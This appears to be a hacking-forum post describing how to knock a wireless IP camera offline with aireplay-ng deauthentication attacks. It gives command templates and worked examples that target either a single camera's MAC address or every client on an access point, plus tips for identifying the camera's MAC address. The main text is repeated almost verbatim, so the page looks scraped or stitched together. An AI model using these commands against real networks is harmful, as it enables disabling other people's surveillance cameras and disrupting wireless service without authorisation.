dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,861
- Solutions
- 4
- Reputation
- 32
- Reaction score
- 45,552
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
Deauthenticating specifically the IP camera (only one client)
aireplay-ng --deauth [number of deauth packets] -a [AP MAC address] -c [IP camera MAC address] [interface]
Ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c 00:AA:11:22:33:44 mon0
You can possibly find the MAC address of the IP camera if you know the device’s brand since the first 6-digits of a MAC address identify the manufacturer (
). You can also try to speculate which is the AP’s MAC address by the name of the SSID. Otherwise, you can use a more wide attack with the code below.
Deauthenticating all clients in a specific network
aireplay-ng --deauth [number of packets] -a [AP MAC address] [interface]
Ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 mon0
That wouldn't be the case of course if the camera app was programmed to periodically check the connection with the router/device and report a lost connection by sending an email to the user for example.
It is also important to point out, that if the IP camera had a wired connection and not a wireless one, this attack would not be possible. When using wireless communication we should always keep in mind that the medium is air and air is accessible to all (thus more “hackable”).
aireplay-ng --deauth [number of deauth packets] -a [AP MAC address] -c [IP camera MAC address] [interface]
Ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c 00:AA:11:22:33:44 mon0
You can possibly find the MAC address of the IP camera if you know the device’s brand since the first 6-digits of a MAC address identify the manufacturer (
This link is hidden for visitors. Please Log in or register now.
Deauthenticating all clients in a specific network
aireplay-ng --deauth [number of packets] -a [AP MAC address] [interface]
Ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 mon0
That wouldn't be the case of course if the camera app was programmed to periodically check the connection with the router/device and report a lost connection by sending an email to the user for example.
It is also important to point out, that if the IP camera had a wired connection and not a wireless one, this attack would not be possible. When using wireless communication we should always keep in mind that the medium is air and air is accessible to all (thus more “hackable”).